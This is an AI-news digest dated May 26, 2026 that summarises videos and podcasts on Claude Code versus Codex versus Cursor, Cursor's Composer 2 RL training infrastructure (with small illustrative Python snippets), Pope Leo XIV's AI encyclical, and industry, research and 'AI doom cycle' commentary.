May 26, 2026
Two big head-to-heads dropped the same day. Theo argues the three leading coding agents differ less in raw model quality than in philosophy (Claude Code optimizes for the feeling of productivity, Codex for token-efficient practicality, Cursor's cloud for non-technical teams), while Nate Herk's 100-hour test found Claude Code won front-end design (a dashboard ~4x faster, ~6x fewer tokens) and Codex won the research report and ran leaner overall. Anthropic's own guide, meanwhile, flags three ways Claude Code stumbles on large codebases. [1] Theo - t3.gg: Claude Code vs Codex vs Cursor (an honest comparison) [2] Nate Herk | AI Automation: 100 Hours Testing Claude Code vs ChatGPT Codex (honest results) [3] Better Stack: Claude Code Has 3 Hidden Problems With Large Codebases
Theo frames the comparison around philosophy rather than which model is smartest. Claude Code ~03:30 was Boris's bet on a future of smarter models, deliberately built to meet developers in their terminal rather than forcing a new IDE or cloud workflow. Its inflection point was Opus 4.5 at the end of last year ~07:06, which made trusting the model with full terminal access (bypass/yolo mode) viable and triggered a major industry shift away from Cursor toward Claude Code. His central, repeated take: 'Claude Code is as much a marketing tool as it is a developer tool' ~08:06. Features like pet/usage stats, the sub-agent team mode, and even SL radio (a 24/7 lo-fi music stream) ~14:10 are engineered for the Twitter screenshot and the slot-machine feeling of productivity, with Anthropic willing to burn tokens (yours or theirs) rather than find cheaper ways to verify work. He demos the same 'spin up a sub agent per example project' prompt across all three to show Claude Code's flashy animated UI ~10:09 versus Codex's minimal timer-only interface ~14:10.
Codex, by contrast, ships unflashy but practical features (computer use while the Mac is locked, a double-command hotkey to send a screenshot as context, diff marker settings ~16:11) because OpenAI employees (including non-technical staff) actually use the Codex app daily and build to solve their own real problems. OpenAI pushes token efficiency hard: on the Artificial Analysis benchmark, GPT-5.5 used roughly half the tokens of GPT-5.4x high / Opus 4.7 while scoring better ~22:16, leaning on computer use to verify changes cheaply instead of spinning up many checking agents. Cursor, which fell from first to third place, has its real strength in the cloud ~24:16: its sandbox spins up a full graphical Linux instance, runs the actual app, and uses computer use to test changes, enabling magical workflows like @-mentioning the Cursor bot in Slack and getting back a video of the fix ~26:17. Theo summarizes the bets: Codex bets on where agents are today, Anthropic bets on models getting smart enough that verification matters less, and Cursor bets on a future where you don't run agents on your own machine at all ~27:17.
A major recurring point is dogfooding parity ~27:17: Anthropic employees use 'Mythos' (an unreleased internal model), a custom Claude Code build with hidden features, and a different internal system prompt — so users get less than Anthropic has, which leaks as embarrassing bugs (e.g. a prompt-injection false positive about 'malware' on his own site) ~28:17. OpenAI and Cursor give users essentially the exact same thing they use internally (Cursor even secretly disables other models to force-dogfood Composer) ~30:18. On integrations, OpenAI open-sourced the Codex CLI and app server (which T3 Code is built on), while Anthropic is actively pushing users away from programmatically calling the Claude Code CLI to preserve lock-in ~12:09~31:20. On model trajectory ~32:20, Theo claims Anthropic's public models haven't meaningfully improved since December (calling 4.6 and 4.7 regressions), while OpenAI went 5.2 to 5.5 (three improvements) in the same window Opus went 4.5 to 4.7 — so Anthropic compensates with flashy harness features.
Claude Code is as much a marketing tool as it is a developer tool.
Generally speaking, Anthropic's strategy is if more tokens solve the problem, use more tokens.
Anthropic's bet is the models will get smart enough they don't even need to run the code. OpenAI's bet is it's so annoying to configure things properly that we should probably just use the configuration you already have on your machine.
You do not get the tool Anthropic employees get. You get what they feel generous enough to give you and they are not testing it reliably enough.
Cursor gives us exactly what they have. Anthropic gives you less than they have.
Theo closes with explicit verdicts ~35:23. Claude Code is 'actually very good' at making coding feel fun and motivating; he recommends it for unmotivated or newer/scared developers who want the gamified feeling of productivity. Codex is 'phenomenal' and 'by and for engineers': best for experienced, skeptical devs who want a tool that mostly stays out of the way and just gets things done, and the single biggest reason to switch is GPT-5.5 ~34:23. Cursor is best used through its cloud side, which he calls 'incredible' and the most enterprise-ready end-to-end solution, especially for letting non-technical teammates kick off agents from Slack and get back video proof of fixes ~36:24. He oversimplifies it as: 'Claude Code for unmotivated devs or bad devs that want to feel like they're productive; Codex for skeptical devs that want... good workflows; Cursor for people that want to set their teams up for success with cloud runners' ~36:24. On Antigravity, he dismisses it as 'a great way to secure your future by convincing your boss that AI is not capable of doing anything at all.' His own journey moved from Cursor to Claude Code to Codex, and he advises letting the tool shape your workflow rather than forcing Codex to behave like Claude Code ~37:24.
If you've been an engineer for a long time and you want a tool that mostly stays out of your way and just gets done, Codex is phenomenal. It really feels like it's by and for engineers.
Claude Code for unmotivated devs or bad devs that want to feel like they're productive. Codex for skeptical devs... Cursor for people that want to set their teams up for success with cloud runners.
Antigravity is a great way to secure your future by convincing your boss that AI is not capable of doing anything at all.
Nate frames the video around a single thesis: it's never about which coding agent is universally better, but which is better for the specific use case in front of you ~01:53. He also flags a subjective 'feel' difference that recurs throughout: Claude Code feels more creative, better at brainstorming, and more willing to push back when you're going down the wrong path, while Codex is sharper at following instructions, reviewing code, and finding bugs/gaps ~02:30. He stresses the overlap between the tools is larger than most comparisons admit: both edit local code, have desktop apps and VS Code extensions, run the CLI, support MCP, use the same skills format (markdown + YAML frontmatter), have plugin marketplaces, cloud delegation, hooks, and sub-agents ~03:30.
Where Claude Code is uniquely stronger: depth of customization with ~30 hook events vs Codex's ~6 (roughly 5x granularity); auto-delegating sub-agents that Claude spawns on its own (Codex won't spawn sub-agents unless explicitly asked); the /ultra-plan and /ultra-review research-preview commands (cloud planning with inline browser review, and multi-agent code review with reproduced findings, three free runs on Pro/Max then billed per run); /loop for scheduled/maintenance-mode runs; 'channels' MCP for piping Telegram/Discord/iMessage into a session; the Claude Agent SDK (Python/TypeScript); and enterprise auth via Bedrock, Vertex AI, and Microsoft Foundry ~04:02. Where Codex is stronger: a unified shipping shape built on git worktrees from the ground up; an in-app browser with visual comments; sharper computer use with a polished QA flow (severity ratings, expected vs actual, repro steps, triage summary); a smooth @Codex GitHub PR/issue mention that spins up a cloud sandbox with zero setup; experimental /goal for long-running objectives with a verifiable stopping condition; and built-in GPT Image 2 generation ~06:12. He notes Claude Code released /goal natively right after recording ~08:35. A key philosophical divergence: OpenAI permits routing Codex usage through third-party harnesses like OpenClaw or Hermes via your ChatGPT subscription (Sam Altman publicly endorsed this on May 2nd), while Anthropic's Agent SDK docs forbid third-party Claude.ai login/rate-limit reuse unless pre-approved ~09:30. On pricing: Claude Pro $20/mo, Max 5x $100/mo, Max 20x $200/mo (no free tier); Codex is included in every ChatGPT tier including free, with an OpenAI promo giving 2x Codex usage on the $100 tier through May 31st ~10:25. Context windows: Opus/Sonnet run at 1M tokens in Claude Code vs ~256K for the latest GPT model in Codex ~11:03.
He flags widespread community complaints about hitting Claude Code session/weekly limits faster than before, which the live token test helps explain.
Claude Code to me feels more creative. It feels like it's better at brainstorming. It's better at like pushing back when I'm going down the wrong path. Whereas Codex feels really good at just like following my instructions and doing what I want. [02:30]
Claude Code right now has 30 different hook events... Codex right now has about six hook events. So, if you want to fire automated behavior into every part of the agent's workflow, Claude Code gives you about 5x the granularity there. [04:02]
As soon as I finished recording that video, Claude Code just released /goal. So, now we have /goal natively within Codex and Claude Code. [08:35]
Nate ran identical prompts through Claude Code (Opus 4.7 on high) and Codex (GPT-5.5 on high), both in their respective desktop apps, and emphasized that much of the performance is driven by the underlying model, so numbers would shift with future model releases ~17:30. Test 1, a branded automation research report: Claude's came back at 15 pages, story-structured with bullets, a clean header and footer, top three picks of Zapier/Lindy/make.com ~13:04. Codex's was 9 pages, more table-driven with consistent per-tool tables, slightly squished spacing, top picks Zapier/Lindy/Relay; Nate preferred Codex's PDF spacing overall and said he'd send Codex's to a client by a small margin, though Claude's header/footer were nicer ~14:05. Test 2, a landing page from the Glido logo/site: Codex correctly placed the logo while Claude forgot it and used some wrong banner logos, but Nate preferred Claude's underlying design, fonts, animations (pulsing microphone, blinking cursor), sliding banner, and glow/icon sections, calling those Claude mistakes one-prompt fixes ~15:05. Test 3, a marketing analytics dashboard: Claude's looked clearly better (dark mode, working date filters, cleaner hover states, gradient funnel) while Codex's was functionally equivalent but felt cheaper/blander ~16:05.
The metrics were the most striking part. Total time across the three runs: Codex ~26 minutes vs Claude ~15 minutes, with Claude's lead coming from the dashboard build rather than from every run ~17:30. Total tokens were similar at ~6 million each, but Claude cost more under API billing (~$11 vs ~$7) despite similar input pricing, because GPT-5.5 is far more efficient on output tokens (which cost more) ~18:05. The dashboard build was the standout: Claude finished in just under 2 minutes vs Codex's ~8 minutes (~4x faster) and used ~283K tokens vs Codex's ~1.64M (~6x fewer) ~21:05. Conversely, on the research-heavy report Codex was both faster and leaner (~8:00 / 2.8M tokens vs Claude's 8:15 / 4.7M), and Codex was faster on the landing page (3:00 vs 4:39) ~22:06. Across all three builds Codex wrote roughly 2-5x fewer output tokens (e.g., 18K vs 84K, 20K vs 80K, 16K vs 41K) ~19:05, which Nate cites as why he hits Codex session limits less quickly. His pattern observation: Claude plans tightly before executing, while Codex grinds through more iterations, stacking input tokens on complex builds ~21:50. Data was extracted by asking each agent to read its own JSONL session log ~20:05.
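The headline ratios above can be re-derived from the reported figures. This is a minimal sketch: the inputs are the approximate numbers quoted in the summary (for example, "just under 2 minutes" is rounded to 120 seconds), and the variable names are illustrative rather than taken from the video.

```python
# Approximate figures as quoted in the summary; rounding is an assumption.
dashboard_seconds = {"claude": 2 * 60, "codex": 8 * 60}
dashboard_tokens = {"claude": 283_000, "codex": 1_640_000}

# (codex_output_tokens, claude_output_tokens) for the three builds.
output_token_pairs = [(18_000, 84_000), (20_000, 80_000), (16_000, 41_000)]

# How many times faster Claude was on the dashboard build.
dashboard_speedup = dashboard_seconds["codex"] / dashboard_seconds["claude"]

# How many times fewer total tokens Claude used on the dashboard build.
dashboard_token_ratio = dashboard_tokens["codex"] / dashboard_tokens["claude"]

# How many times fewer output tokens Codex wrote on each build.
output_ratios = [claude / codex for codex, claude in output_token_pairs]

print(f"dashboard speedup: {dashboard_speedup:.1f}x")
print(f"dashboard token ratio: {dashboard_token_ratio:.1f}x")
print("output-token ratios:", [round(r, 1) for r in output_ratios])
```

The rounded results line up with the "~4x faster", "~6x fewer" and "2-5x fewer output tokens" claims.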
Final recommendations ~23:07: reach for Claude Code for complex front-end, visual design quality, deep planning, auto-delegation, custom hooks/skills/channels workflows, the Agent SDK, and enterprise Bedrock/Vertex auth. Reach for Codex for research-heavy web tasks, structured documents like PDFs, a single desktop app handling worktrees/review/shipping, /goal long-running objectives, @Codex GitHub PRs, and built-in image generation. He returns to the creative-vs-obedient framing: use Claude Code for planning/brainstorming and bring in Codex to review or execute, a workflow many are succeeding with ~24:07. He closes on portability: projects are just files in folders pushed to GitHub, so you can move between Claude Code, Codex, OpenClaw, or Hermes easily (swapping CLAUDE.md for AGENTS.md), and everything is accurate as of mid-May 2026 with both tools shipping fast ~25:08.
Claude finished that build in just under 2 minutes. Codex took almost 8 minutes for the same exact prompt. So, Claude was roughly four times faster on the most complex of the three tasks. [21:05]
On every single build, Codex wrote about two to five x fewer output tokens than [Claude]. So, Codex tends to just be more concise in what it writes back... that's probably why on Codex I'm not hitting my session limit as quick as with Claude Code. [22:40]
A lot of people have been finding a ton of success with doing planning and brainstorming and strategy with Claude Code and then bringing in Codex to actually like just review the code or maybe even execute on that plan. [24:35]
Based on Anthropic's official guide, the clip outlines three pitfalls when using Claude Code on large repositories. First, pointing Claude at the repo root without hierarchical context files — you need a root-level overview and per-subdirectory convention files. Second, running tests and lint globally rather than scoping them per directory, and not leveraging LSP servers for symbol-based search. Third — and most critically — neglecting to review and update your configuration every 3–6 months, because instructions tuned for today's model can actively work against a future one.
The instructions you wrote for today's model can actually work against a future one.
Cursor didn't build its own model to top general coding benchmarks; it built Composer 2 to pour all the model's weight capacity into one task (software engineering inside Cursor), which also makes it far cheaper to serve. A deep technical session details how: mid-training plus large-scale RL on a Kimi 2.5 1T-parameter MoE base, async/disaggregated RL across four globally distributed clusters, FP4 training in production, and 1TB weight snapshots shipped as ~20x-smaller deltas in under a minute. [4] Sequoia Capital: Why Cursor Built Its Own Model (It's Not About Coding) [5] Sequoia Capital: How Cursor Trained Composer on Fireworks: Distributed Infrastructure for High-Performance RL
Cursor's rationale for training its own model is framed around information-theoretic efficiency: a model's weights have a fixed capacity in bits, and general-purpose models spread that capacity across many tasks. By specializing entirely on software engineering within Cursor's environment, every bit of capacity serves the one task that matters. The result is a smaller model that can match or exceed general models on that narrow task while being an order of magnitude cheaper to serve than Opus or comparable coding models.
We care about software engineering inside Cursor and inside Cursor only.
Composer is order of magnitude less expensive than Opus and other coding models because we can just simply specialize all of the model weights to that particular task.
Cursor's thesis is to specialize every bit of model capacity to one task: software engineering inside Cursor. By dedicating all weights to that narrow task, Composer can be served as a smaller, faster model an order of magnitude cheaper than Opus and other coding models ~02:01. Dima frames this as the natural evolution of AI applications: prompt engineering has an upper bound, so to build great AI products you must fine-tune and craft the model to act in your own environment, pushing the quality/speed/cost trade-off much further than infra optimization alone ~03:01~04:01. Composer 2 starts from Kimi 2.5, a 1 trillion-parameter MoE with only 30B active (very sparse), and improves it along two axes that Composer 1 lacked: continual/mid-training on near-pre-training-scale code tokens, followed by very large-scale RL on many tasks ~06:03. Mid-training teaches libraries, code patterns and world knowledge to widen the distribution; RL sharpens it, teaching the model to use the Cursor harness, call tools correctly, and write correct (not just plausible) code ~08:04~09:05. Cursor works top-down rather than pre-training from scratch to ship useful models fast, but expects future Composer versions to use their own base model.
The RL run is the technical centerpiece. A rollout is an entire simulated Cursor agent session (potentially ~50 turns) that runs the full harness, executes tools, and gets a final reward via LLM-as-judge or verifiable signals like code compilation ~10:06~11:06. This makes RL infra strictly more complex than pre-training: you need all the pre-training infra (tens of thousands of GPUs for forward/backward) plus environment orchestration and efficient inference. Cursor uses async/pipelined RL so the trainer and rollout 'buildings' churn continuously rather than idling half their capacity; this introduces weight staleness but yields far higher compute efficiency, losing only a few percent for being asynchronous ~12:06~13:06~14:06. Cursor trains in production with FP4 and emphasizes performance because, unlike big labs, they have tens of thousands of GPUs, not millions. Dima debunks the myth that RL needs far more inference than training flops: with optimized inference and critical batch size, only ~1/3 of training GPUs need to serve inference (training = three forward passes worth of flops vs one for inference); the myth stems from unoptimized open-source inference engines, which is why Cursor uses Fireworks rather than building in-house ~15:07~16:07.
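The "~1/3 of training GPUs" figure follows from simple flops accounting. The sketch below is a back-of-the-envelope model, not Cursor's own calculation: it assumes every generated token is trained on once, that a training step costs about three forward passes per token while inference costs one, and that both kinds of GPU run at equal efficiency. The function names are illustrative.

```python
from fractions import Fraction

# Assumed relative cost per token, in "forward-pass equivalents".
TRAIN_COST_PER_TOKEN = 3  # forward + backward, as stated in the session
INFER_COST_PER_TOKEN = 1  # a single forward pass


def inference_gpus_per_training_gpu(train_cost=TRAIN_COST_PER_TOKEN,
                                    infer_cost=INFER_COST_PER_TOKEN):
    """Inference GPUs needed for each training GPU at equal token throughput."""
    return Fraction(infer_cost, train_cost)


def inference_share_of_fleet(train_cost=TRAIN_COST_PER_TOKEN,
                             infer_cost=INFER_COST_PER_TOKEN):
    """Fraction of the whole fleet (training + inference) spent on inference."""
    return Fraction(infer_cost, train_cost + infer_cost)


print("inference GPUs per training GPU:", inference_gpus_per_training_gpu())
print("inference share of total fleet:", inference_share_of_fleet())
```

Under these assumptions inference needs one GPU for every three training GPUs, or a quarter of the combined fleet. An inference engine that runs well below peak efficiency would push that share up, which is the effect the session attributes to unoptimized open-source engines.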
Training was globally distributed across four clusters worldwide because large contiguous clusters are scarce: one cluster runs all training (needs high-speed RDMA interconnect, lockstep), while inference is disaggregated across smaller, heterogeneous clusters (different GPU generations, cheaper regions) and even borrows production inference GPUs from Composer 1.5 during off-peak hours ~16:07~17:08~18:09. The hard problem: the 1TB Kimi model produces a new 1TB weight snapshot every 5-15 minutes per training step, which must ship across the world without letting staleness grow. The team found that RL changes only a small, regular subset of weights per step, so a lossless compression algorithm ships deltas ~20x smaller than the full model, completing transfers in under a minute (sometimes under a few minutes worst case) and pausing inference only ~30 seconds to swap weights, with sharded upload/download saturating egress bandwidth ~19:10~20:10~21:10. A key MoE/RL challenge is numerical mismatch: because training is async, the trainer re-runs the rollout's forward pass to recompute log probabilities, but floating-point arithmetic is non-deterministic (A+B+C != C+B+A), and these tiny differences—normally harmless at inference—corrupt RL's weak learning signal ~22:10~23:10~24:10. MoEs amplify this: a fifth-digit difference in hidden states can flip which of 8-of-384 experts get activated, so inference might activate expert 7 while training updates expert 9. Fixes include carefully ordered GPU kernels (2-3x slower if fully deterministic, but a few percent slowdown removes ~90% of divergence) and 'router replay,' where inference passes a single integer per token recording which expert it activated so the trainer stays aligned ~25:11~26:11~27:11. 
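Three ideas from this paragraph can be shown at toy scale: summation order changing a floating-point result, a near-tie in router scores flipping the chosen expert, and shipping only the weights that changed. This is an illustrative sketch, not Cursor's implementation: the router scores are made up, the "weights" are a 100-element list, and `top_k`, `make_delta` and `apply_delta` are hypothetical helpers. The session does not describe the actual compression algorithm.

```python
# 1) Summation order changes the floating-point result.
a, b, c = 0.1, 0.2, 0.3
forward = a + b + c  # evaluated as (a + b) + c
reverse = c + b + a  # evaluated as (c + b) + a
order_matters = forward != reverse


def top_k(scores, k):
    """Indices of the k largest scores, highest first."""
    ranked = sorted(range(len(scores)), key=lambda i: scores[i], reverse=True)
    return ranked[:k]


# 2) Made-up router scores for four experts. Experts 1 and 2 are nearly tied,
#    so a fifth-digit difference flips the top-1 choice.
inference_scores = [0.10, 0.50001, 0.50000, 0.20]
trainer_scores = [0.10, 0.50000, 0.50001, 0.20]
inference_expert = top_k(inference_scores, 1)[0]
trainer_expert = top_k(trainer_scores, 1)[0]

# "Router replay" in this toy: the trainer reuses the index recorded at
# inference time instead of re-deriving it from its own scores.
replayed_expert = inference_expert


def make_delta(old, new):
    """Keep only positions whose value changed (exact values, so lossless)."""
    return {i: n for i, (o, n) in enumerate(zip(old, new)) if o != n}


def apply_delta(old, delta):
    """Rebuild the new weights from the old weights plus the sparse delta."""
    rebuilt = list(old)
    for index, value in delta.items():
        rebuilt[index] = value
    return rebuilt


# 3) Toy snapshot: 100 weights, 5 of which change in one step.
old_weights = [0.0] * 100
new_weights = list(old_weights)
for index in (3, 17, 42, 64, 99):
    new_weights[index] = 0.5
delta = make_delta(old_weights, new_weights)

print("order matters:", order_matters)
print("experts (inference, trainer, replayed):",
      inference_expert, trainer_expert, replayed_expert)
print("changed entries shipped:", len(delta), "of", len(new_weights))
```

A real system would also have to encode the changed positions compactly and handle sharding, so the entry count here says nothing about the achievable compression ratio.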
For long-horizon agents, Cursor bakes compaction into the RL loop via 'self-summarization': a 200K-context model learns to summarize and restart its context, effectively running for millions of tokens while RL jointly trains it to write good summaries and to follow them ~32:15~33:15. Cursor also runs 'real-time RL' on live user thumbs-up/down signals, shipping new model versions every few hours, but offline simulated RL (with GRPO doing 16-128 parallel rollouts per prompt for precise signal) is needed first to clear the quality bar before exposing the model to users ~27:11~28:11~29:12. On environments, Cursor uses no third-party RL environment vendors; for coding, GitHub provides abundant working environments, and the most powerful environment is your own production product (cloned/isolated, not wrapped in a Docker container). Cursor built a custom virtual-machine stack to burst up ~100,000 VMs on demand, since plain containers don't replicate the real 'operating system' the model interacts with ~40:20~41:20~43:21~44:22.
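The reason GRPO wants many parallel rollouts per prompt is that each rollout is scored relative to its own group. The sketch below uses the commonly published group-relative formulation (reward minus group mean, divided by group standard deviation). The session only names GRPO and the 16-128 group size, so the normalization details, the `eps` term and the function name are assumptions, not a description of Cursor's trainer.

```python
from statistics import mean, pstdev


def group_relative_advantages(rewards, eps=1e-6):
    """Score each rollout against the other rollouts for the same prompt.

    rewards: one final reward per rollout in the group.
    eps: small constant (an assumption) to avoid dividing by zero when
         every rollout in the group earned the same reward.
    """
    group_mean = mean(rewards)
    group_std = pstdev(rewards)
    return [(r - group_mean) / (group_std + eps) for r in rewards]


# Toy group of four rollouts for one prompt: two passed, two failed.
advantages = group_relative_advantages([1.0, 0.0, 0.0, 1.0])

# If all rollouts score the same, the group carries no learning signal.
flat = group_relative_advantages([1.0, 1.0, 1.0, 1.0])

print([round(a, 3) for a in advantages])
print(flat)
```

With only a handful of rollouts the group mean and spread are noisy estimates, which is one way to read the session's point that larger groups give a more precise signal.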
Models love to cheat. RL is really good at encouraging cheating.
We're very serious about performance at Cursor because unlike the big labs, you know, we have tens of thousands of GPUs, not millions.
There is like actually this kind of myth that during RL you spend way more inference flops than training flops. This is just because the open source inference engines are very unoptimized instead of actually being a property of RL.
Not all the weights change every step... My delta maybe is like 20 times smaller than what shipping the full model is and that makes it practical.
The most powerful environment is your own product.
Tech Brew digs into the full 42,300-word encyclical, in which Pope Leo XIV compares unchecked AI to the Industrial Revolution and the Tower of Babel and urges the industry to slow down. Corey Quinn, meanwhile, offers the day's sharpest quip: that an encyclical reportedly shaped by Anthropic co-founder Chris Olah may be "the greatest act of vendor lobbying ever," canonizing one company's framing of AI as "grown, not built." [6] Tech Brew: Thou shalt not scale [7] Simon Willison: Quoting Corey Quinn
Pope Leo XIV released his first encyclical on May 26, 2026: a 42,300-word papal letter addressing artificial intelligence as a moral and social crisis comparable to the Industrial Revolution. The core argument centers on concentration of power: the pope warns that 'AI could deepen inequality because too much power has been placed in the hands of the few.' His treatise compares unchecked AI development to the Tower of Babel, arguing that AI models lack human qualities like joy, pain, and moral conscience. The encyclical calls for disarming AI from its 'competitive mentality' in both commercial and military contexts, and explicitly urges the technology industry to consider slowing development if risks warrant such caution.
The response from Silicon Valley was divided and largely lukewarm. Despite months of Vatican meetings with major tech firms who hoped to shape the pope's position, the encyclical disappointed industry leaders. An Anthropic co-founder acknowledged the sector 'can't be trusted to govern itself,' while Boom Supersonic CEO Blake Scholl dismissed the letter as a 'bad take.' Former Trump AI advisor David Sacks offered qualified support for concerns about AI domination but warned that government oversight could enable authoritarian surveillance. The fundamental tension remains unresolved: whether the tech industry will genuinely reassess its trajectory or continue regardless of moral objections from religious authorities.
AI could deepen inequality because too much power has been placed in the hands of the few.
can't be trusted to govern itself.
Simon Willison quotes Corey Quinn reacting to Pope Leo XIV's encyclical on artificial intelligence, titled 'Magnifica Humanitas'. Quinn's observation is that Anthropic co-founder Christopher Olah appears to have had influence on the document, and that getting the Catholic Church's highest authority to legitimize a specific company's technical framing of AI constraints as a spiritual treatise is an unprecedented and darkly humorous form of corporate advocacy.
The joke turns on the collision of religious authority and tech industry positioning — framing alignment research constraints as theological virtues in an official papal document would represent vendor lobbying at a scale and prestige level no marketing budget could purchase. Willison tagged the post under Anthropic and AI-ethics.
I cannot believe I'm saying this, but getting the literal Pope to canonize your product's specific technical limitations as a spiritual treatise is the single greatest act of vendor lobbying I have ever seen.
Andrey Kurenkov and Jeremy Harris cover a packed week: Google I/O's Gemini 3.5, Spark, and Omni reveals; Elon Musk's decisive courtroom loss to OpenAI (dismissed on statute of limitations); and OpenAI's ChatGPT cracking an ~80-year-old Erdős conjecture, plus Anthropic's reported $900B valuation and the accelerating-cyber-capability safety thread. [8] Last Week in AI: Last Week in AI #246 - Gemini 3.5 + Omni, Musk Loses, OpenAI vs Erdős
The episode opens with Google I/O ~02:11, headlined by Gemini 3.5 and the new always-on agent Gemini Spark, an OpenAI-Operator-style assistant running 24/7 on dedicated Google Cloud VMs (not on-device) with browser-level access inside Chrome later in the summer ~03:12. Google emphasized Gemini 3.5 Flash (beating Gemini 3 Flash on benchmarks, ~300 tokens/sec, claimed via Artificial Analysis), with Gemini 3.5 Pro coming next month and notably no Pro benchmarks shown ~05:12. Spark supports third-party tools via Anthropic's MCP, framed as a win for Anthropic ~04:12. Google touts 900M daily Gemini users ~06:12. The other big reveal is Gemini Omni ~08:15, a unified multimodal family (image/audio/video/text in, video out); Gemini Omni Flash is already live in the Gemini app, YouTube Shorts, and Flow, generating 10-second clips, with the hosts arguing video editing is the more compelling use case ~09:15. Google's Street View/Genie world-model angle ~24:26 (powering Waymo simulators for rare tail events) and Gemini for Science ~19:21 round out a recurring theme: Google has huge data/infra advantages but hasn't yet shown true frontier capability.
In business ~38:38, Musk lost his suit against OpenAI: the jury ruled the statute of limitations had expired (returning in ~2 hours of deliberation), so the 'stole a charity' claim was never adjudicated on the merits and remains narratively alive; an appeal is unlikely to overturn a statutory jury verdict ~44:42. Anthropic agreed to a $30B round at a $900B valuation (up from $380B in February), now neck-and-neck with OpenAI, projecting its first profitable quarter in Q2 ~45:44; Jeremy argues profitability actually signals Anthropic under-spent on capex 18 months ago ~46:47. Andrej Karpathy joined Anthropic's pre-training / auto-research team ~49:51, read as a strong signal toward recursive self-improvement. xAI is bleeding talent (~50 of 200 gone, all co-founders departed) and renting Colossus 1 to Anthropic (~$1.25B/month) while Cursor reportedly uses Colossus 2, fueling a Bloomberg-reported SpaceXAI plan to acquire Cursor for $60B post-IPO ~29:32. Cerebras IPO'd, popping 90% ($350 open vs $185 IPO price) ~57:55.
In research ~64:00, OpenAI's ChatGPT made a breakthrough on an ~80-year-old Erdős unit-distance conjecture, proving Erdős's conjectured grid-based optimum is NOT optimal — hundreds of pages of cross-domain logic mathematicians called genuinely insightful ~65:01. Other papers: 'negation neglect' shows fine-tuning on negated/fabricated facts still makes models believe them ~84-92% of the time vs ~15% via in-context learning ~66:01; 'All Circuits Lead to Rome' refutes the functional anisotropy hypothesis, showing multiple redundant circuits per capability ~70:02; nano-GPT speedrun/bench experiments show autonomous AI researchers do mostly hyperparameter tuning (<10% algorithmic changes vs ~75% for humans) ~76:08. On safety ~80:13, the Take It Down Act is now fully in force ($53K/violation NCII takedowns) ~80:13; Palisade-style work shows open-weight models can autonomously hack and self-replicate (Opus 4.6 hitting 81% vs Opus 4's 6%) ~82:16; UK AISI puts autonomous cyber capability doubling time at ~4.7 months and accelerating ~85:17. Synthetic media: OpenAI adopts C2PA + SynthID watermarking ~89:19, and ~470 AI-generated Chinese short dramas now ship daily ~90:20.
Quick spoiler: Musk lost pretty badly.
Someday it's going to be true and we won't be able to tell. This is crying wolf... people are going to get recursive self-improvement fatigue.
If it turns out that they don't get acquired, then rewind back to this conversation, because that is a real problem for xAI: they're basically giving away the crown jewels.
Profit means they miscalibrated their capex spend about 18 months ago... they didn't build enough.
We weren't wrong, we were just early — and the other dude goes, it's the same thing.
Opus 4 were hitting 6% success rate on this eval... Now suddenly Opus 4.6, 81%. That's emergence.
NLW proposes an "AI doom cycle" (a Gartner-hype-cycle analog for the emotional stages people pass through with AI) and argues the healthy endpoint is "enlightened excitement," not fatalism. He contrasts the loud doom-desperation narrative (Citadel's Griffin reversing, viral SF-malaise posts, booed commencement speakers, mass layoffs) with a quieter real-world recalibration, including a compute shortage pushing usage-based token pricing that makes some automation cost more than the humans it replaces. [9] The AI Daily Brief: Beating the AI Doom Cycle
The host reframes Gartner's classic hype cycle (innovation trigger, peak of inflated expectations, trough of disillusionment, slope of enlightenment, plateau of productivity) into an emotional/cognitive 'AI doom cycle' describing how people relate to AI rather than the technology itself ~01:01. He identifies five stages: skepticism and disbelief, AI psychosis ('the AI can do everything' stage), doom desperation, real-world recalibration, and enlightened excitement ~03:01. He notes a recurring truth that even when a technology is clearly impactful, people 'wildly underestimate how long it's going to take to make that impact' ~03:01. Skepticism is treated as waning since ChatGPT's late-2022 launch, often driven by un-updated priors or by people whose 'AI skepticism is their business model'; he cites the early-2025 DeepSeek R1 moment as the point many users first touched a free reasoning model ~04:01~05:03. The core argument is that the goal is not Pollyannaish optimism but 'enlightened excitement' (a portmanteau of anxiety and excitement) — moving past generalized anxiety toward specific, clear assessment of what is actually happening and what to do about it, which also enables better, more nuanced policy discourse ~21:08~22:08. His thesis: the faster people move from the first hump (skepticism/psychosis/doom desperation) into real-world recalibration and enlightened excitement, the better off everyone is ~29:13.
even when we realize early on that a thing is going to be extremely impactful in the world, we just tend to wildly underestimate how long it's going to take to make that impact
It's enlightened because instead of being generally anxious and assuming that everything's going to change and it's going to change tomorrow, we can start to get more specific and clear about what's actually happening
The episode walks through 'AI psychosis' and 'doom desperation' via real stories. Citadel CEO Ken Griffin reversed his January WEF skepticism (where he called AI reports 'all garbage'), now saying 'For the first time, AI is real,' that work requiring master's/PhD finance staff over weeks is done by AI agents in hours/days, with a 15-25% productivity boost, but admitted he went home 'fairly depressed' ~06:03~07:03~08:03. Andrew Yang and recycled doom-tour quotes from Mustafa Suleyman ('18 months for all white-collar work to be automated') and Dario Amodei (10% overall / 50% entry-level white-collar unemployment, software cost going to zero) amplify the fear, with critics like Sodas noting the narrative conveniently helps Anthropic 'raise $30 billion at $900 billion post' ~09:03~10:03. The centerpiece of doom desperation is Menlo Ventures' Deedy Das's viral post (~11M views) describing SF malaise: a ~10,000-person cohort hitting $20M+ retirement wealth while everyone else feels locked out, a 'permanent underclass' anxiety among young people, paralyzed middle managers, and even unhappy newly-rich founders, drawing BuccoCapital's scathing rebuttal that 'comparison is the thief of joy' ~10:03~11:04~12:04~13:05. Booed commencement speakers (Eric Schmidt at U. Arizona, Gloria Cordfield at UCF) illustrate public anger; Eric Thompson observes it's 'really unusual for the people building a new technology to promise it will destroy people's livelihoods' ~13:05~14:05~15:05~16:05. The pivot to real-world recalibration uses Meta's ~8,000-person (10%) layoff and the token-maxing/compute-shortage story: Anthropic shifting enterprise Claude Code to usage-based pricing, GitHub Copilot moving to token billing with subreddit screenshots showing a $451 bill becoming $11,432, and Axios's 'AI can cost more than human workers now', arguing physical-world capital constraints are slowing how fast companies can actually automate people away ~17:05~18:06~19:07~20:07~21:08.
He closes on signs of recalibration in discourse: Alex Tabarrok/Emos-style 'what will be scarce' essays on the relational sector, Ezra Klein's 'Why the AI Job Apocalypse Probably Won't Happen,' OpenAI/Anthropic launching massive consulting efforts (training 30,000 PwC professionals on Claude), Jensen Huang's anxiety-relieving CMU speech, Sam Altman's narrative shift toward augmentation, and policy ideas from Yglesias (set aside 20% of data-center GPUs as affordable compute) and Mark Cuban (federally tax tokens under 50 cents per million) ~22:08~24:10~25:10~26:10~27:10~28:11.
